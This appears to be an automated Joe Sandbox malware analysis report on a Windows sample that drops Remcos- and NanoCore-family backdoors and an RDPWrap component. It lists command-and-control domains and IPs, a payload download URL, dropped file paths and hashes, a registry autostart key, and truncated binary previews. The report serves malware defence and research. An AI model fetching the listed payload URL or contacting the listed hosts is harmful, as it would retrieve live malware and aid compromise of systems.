LOVESERVERSGB Netherlands 34->80 82 sdafsdffssffs.ydns.eu 34->82 60 C:\Users\user\AppData\Roaming\KetqqsbuJ.exe, PE32 34->60 dropped 62 C:\Users\user\AppData\Local\...\microC[1].exe, PE32 34->62 dropped 64 C:\Program Files\Microsoft DN1\sqlmap.dll, PE32+ 34->64 dropped 94 Hides user accounts 34->94 96 Tries to harvest and steal browser information (history, passwords, etc) 34->96 98 Writes to foreign memory regions 34->98 102 3 other signatures 34->102 43 KetqqsbuJ.exe 3 34->43         started        47 cmd.exe 1 34->47         started        100 Creates an undocumented autostart registry key 39->100 file14 signatures15 process16 file17 72 C:\Users\user\AppData\...\KetqqsbuJ.exe.log, ASCII 43->72 dropped 114 Multi AV Scanner detection for dropped file 43->114 116 Machine Learning detection for dropped file 43->116 49 KetqqsbuJ.exe 1 11 43->49         started        54 conhost.exe 47->54         started        signatures18 process19 dnsIp20 74 hhjhtggfr.duckdns.org 49->74 56 C:\Program Files (x86)\...\dhcpmon.exe, PE32 49->56 dropped 58 C:\Users\user\AppData\Roaming\...\run.dat, data 49->58 dropped 92 Hides that the sample has been downloaded from the Internet (zone.identifier) 49->92 file21 signatures22

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Xjf4yH9N2t.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\KetqqsbuJ.exe100%Joe Sandbox ML
      C:\ProgramData\images.exe100%Joe Sandbox ML
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe20%ReversingLabsByteCode-MSIL.Backdoor.Remcos
      C:\Program Files\Microsoft DN1\sqlmap.dll20%MetadefenderBrowse
      C:\Program Files\Microsoft DN1\sqlmap.dll43%ReversingLabsWin64.Trojan.RDPWrap
      C:\ProgramData\images.exe20%ReversingLabsByteCode-MSIL.Backdoor.Androm
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exe20%ReversingLabsByteCode-MSIL.Backdoor.Remcos
      C:\Users\user\AppData\Roaming\KetqqsbuJ.exe20%ReversingLabsByteCode-MSIL.Backdoor.Remcos

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      22.3.images.exe.e32c38.5.unpack100%AviraHEUR/AGEN.1132033Download File
      40.2.KetqqsbuJ.exe.5260000.20.unpack100%AviraTR/NanoCore.fadteDownload File
      22.2.images.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
      40.2.KetqqsbuJ.exe.3d08a28.9.unpack100%AviraTR/NanoCore.fadteDownload File
      40.2.KetqqsbuJ.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      7.2.Xjf4yH9N2t.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
      22.3.images.exe.e32c38.4.unpack100%AviraHEUR/AGEN.1132033Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://hutyrtit.ydns.eu/13%VirustotalBrowse
      http://hutyrtit.ydns.eu/0%Avira URL Cloudsafe
      http://stascorp.comDVarFileInfo$0%Avira URL Cloudsafe
      http://hutyrtit.ydns.eu/qB0%Avira URL Cloudsafe
      http://hutyrtit.ydns.eu/microC.exe=S;X0%Avira URL Cloudsafe
      http://hutyrtit.ydns.eu/microC.exeASwX0%Avira URL Cloudsafe
      http://hutyrtit.ydns.eu/microC.exe100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      sdafsdffssffs.ydns.eu
      203.159.80.186
      truefalse
        high
        hutyrtit.ydns.eu
        203.159.80.165
        truefalse
          high
          hhjhtggfr.duckdns.org
          203.159.80.186
          truefalse
            high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://hutyrtit.ydns.eu/microC.exetrue
            • Avira URL Cloud: malware
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://support.google.com/chrome/?p=plugin_flashimages.exe, 00000016.00000002.482254171.0000000004A17000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482229544.00000000049CB000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482220451.00000000049A0000.00000004.00000001.sdmpfalse
              high
              http://hutyrtit.ydns.eu/images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmptrue
              • 13%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://stascorp.comDVarFileInfo$images.exe, 00000016.00000003.313221869.0000000000EB7000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://support.google.com/chroimages.exe, 00000016.00000002.482254171.0000000004A17000.00000004.00000001.sdmpfalse
                high
                https://github.com/syohex/java-simple-mine-sweeperC:Xjf4yH9N2t.exe, 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, images.exe, 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmpfalse
                  high
                  http://google.comKetqqsbuJ.exe, 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmpfalse
                    high
                    http://hutyrtit.ydns.eu/qBimages.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://support.google.com/chrome/answer/6258784images.exe, 00000016.00000002.482229544.00000000049CB000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482220451.00000000049A0000.00000004.00000001.sdmpfalse
                      high
                      http://hutyrtit.ydns.eu/microC.exe=S;Ximages.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/syohex/java-simple-mine-sweeperXjf4yH9N2t.exefalse
                        high
                        http://hutyrtit.ydns.eu/microC.exeASwXimages.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        203.159.80.186
                        sdafsdffssffs.ydns.euNetherlands
                        47987LOVESERVERSGBfalse
                        203.159.80.165
                        hutyrtit.ydns.euNetherlands
                        47987LOVESERVERSGBfalse

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:457791
                        Start date:02.08.2021
                        Start time:10:16:11
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 14m 15s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:Xjf4yH9N2t.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:42
                        Number of new started drivers analysed:3
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.evad.winEXE@27/18@11/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 85.5% (good quality ratio 84.7%)
                        • Quality average: 88.5%
                        • Quality standard deviation: 18.9%
                        HCA Information:
                        • Successful, ratio: 92%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • TCP Packets have been reduced to 100
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 23.211.6.115, 104.43.139.144, 20.82.210.154, 23.211.4.86, 173.222.108.210, 173.222.108.226, 40.112.88.60, 80.67.82.235, 80.67.82.211
                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        10:17:16API Interceptor1x Sleep call for process: Xjf4yH9N2t.exe modified
                        10:17:38API Interceptor1x Sleep call for process: images.exe modified
                        10:17:45API Interceptor664x Sleep call for process: cmd.exe modified
                        10:18:12API Interceptor408x Sleep call for process: KetqqsbuJ.exe modified
                        10:18:20AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                        10:18:50API Interceptor1x Sleep call for process: dhcpmon.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                        Process:C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1378816
                        Entropy (8bit):7.548476087877472
                        Encrypted:false
                        SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                        MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                        SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                        SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                        SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 20%
                        Reputation:unknown
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                        C:\Program Files\Microsoft DN1\rdpwrap.ini
                        Process:C:\ProgramData\images.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):181846
                        Entropy (8bit):5.421809355655133
                        Encrypted:false
                        SSDEEP:768:WEUfQYczxEQBLWf9PUupBdfbQnxJcRZsMFdKlax8Rr/d6gl/+f8jZ0fyL+8F7f6/:57f6GqZm0c11IvimstYUWtN/7
                        MD5:6BC395161B04AA555D5A4E8EB8320020
                        SHA1:F18544FAA4BD067F6773A373D580E111B0C8C300
                        SHA-256:23390DFCDA60F292BA1E52ABB5BA2F829335351F4F9B1D33A9A6AD7A9BF5E2BE
                        SHA-512:679AC80C26422667CA5F2A6D9F0E022EF76BC9B09F97AD390B81F2E286446F0658524CCC8346A6E79D10E42131BC428F7C0CE4541D44D83AF8134C499436DAAE
                        Malicious:false
                        Reputation:unknown
                        Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2020-08-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM
                        C:\Program Files\Microsoft DN1\sqlmap.dll
                        Process:C:\ProgramData\images.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):116736
                        Entropy (8bit):5.884975745255681
                        Encrypted:false
                        SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                        MD5:461ADE40B800AE80A40985594E1AC236
                        SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                        SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                        SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                        Malicious:true
                        Antivirus:
                        • Antivirus: Metadefender, Detection: 20%, Browse
                        • Antivirus: ReversingLabs, Detection: 43%
                        Reputation:unknown
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                        C:\ProgramData\images.exe
                        Process:C:\Users\user\Desktop\Xjf4yH9N2t.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1309184
                        Entropy (8bit):7.518165195771859
                        Encrypted:false
                        SSDEEP:24576:HCIH76DO6fx8Dgyfx8Dgxz2MqBSYe6bOnb7IwDZN2L:pH76X58Dgy58DgxiMdYe6qnb7/Z4
                        MD5:2318B60075E442CB6141535E268E4DF0
                        SHA1:6D2E6E0BFDB0E649E0079533ECDBE302FF9DC8B5
                        SHA-256:CDBE67339A29BFE3066A18B4E68E9B19E28E449AB21CE23A85ED15E04C5255DF
                        SHA-512:160013EED136F4DB2F3AB2B662E62966DAA6959C3FF5DBB8125E3E49F8D41E63CA5CA65FFE5F85370E27C39870BFE3D2DC3F09D629665B59E71E7C32A5C94413
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 20%
                        Reputation:unknown
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b..a..............P..............<... ...@....@.. .......................@............@.................................x<..O....@..(.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...(....@....... ..............@..@.reloc....... ......................@..B.................<......H........0..........s...8...@`............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                        C:\ProgramData\images.exe:Zone.Identifier
                        Process:C:\Users\user\Desktop\Xjf4yH9N2t.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Reputation:unknown
                        Preview: [ZoneTransfer]....ZoneId=0
                        C:\Users\user\AppData\Local\Microsoft Vision\02-08-2021_10.17.46
                        Process:C:\ProgramData\images.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):3.113204882778696
                        Encrypted:false
                        SSDEEP:3:blXlulovDluLAnyWdl+SliXln:zuWpyWn+Sk1
                        MD5:4B99C50453B52153CB7CFB2810B982D8
                        SHA1:FD7A010AD17F7F9D21B3F37FB8B15644CCC661C7
                        SHA-256:30EE264F1887C07BD390E0AB05F62FC8E1064CAFBECA6A679C345C934CD52F08
                        SHA-512:F6C9E795F955812F370565B8EAB62BEFC6EE9DA3E2619098DC3425C79539EA507C2F1CA0F7122E46692F33586E1811D5BBF4F6F40150187269025F48208CED6D
                        Malicious:false
                        Reputation:unknown
                        Preview: ..{.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.}...L.e.f.t. .W.i.n.d.o.w.s.r.
                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KetqqsbuJ.exe.log
                        Process:C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.355304211458859
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                        Malicious:true
                        Reputation:unknown
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Xjf4yH9N2t.exe.log
                        Process:C:\Users\user\Desktop\Xjf4yH9N2t.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.355304211458859
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                        Malicious:true
                        Reputation:unknown
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
                        Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.355304211458859
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                        Malicious:false
                        Reputation:unknown
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\images.exe.log
                        Process:C:\ProgramData\images.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.355304211458859
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                        Malicious:false
                        Reputation:unknown
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exe
                        Process:C:\ProgramData\images.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:downloaded
                        Size (bytes):1378816
                        Entropy (8bit):7.548476087877472
                        Encrypted:false
                        SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                        MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                        SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                        SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                        SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 20%
                        Reputation:unknown
                        IE Cache URL:http://hutyrtit.ydns.eu/microC.exe
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
